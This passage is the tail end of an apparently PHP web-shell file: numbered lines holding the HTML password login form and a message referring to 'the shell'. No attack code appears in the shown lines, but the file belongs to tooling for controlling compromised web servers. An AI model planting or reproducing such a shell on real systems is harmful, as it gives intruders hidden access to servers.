7901 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
7902 </tr>
7903 <tr>
7904 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
7905 </tr>
7906 <tr>
7907 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
7908 </tr>
7909 </table>
7910 </div>
7911
7912 </form>
7913 </center>
7914<br>
7915
7916</body>
7917</html>
7918<?php
7919}
7920?>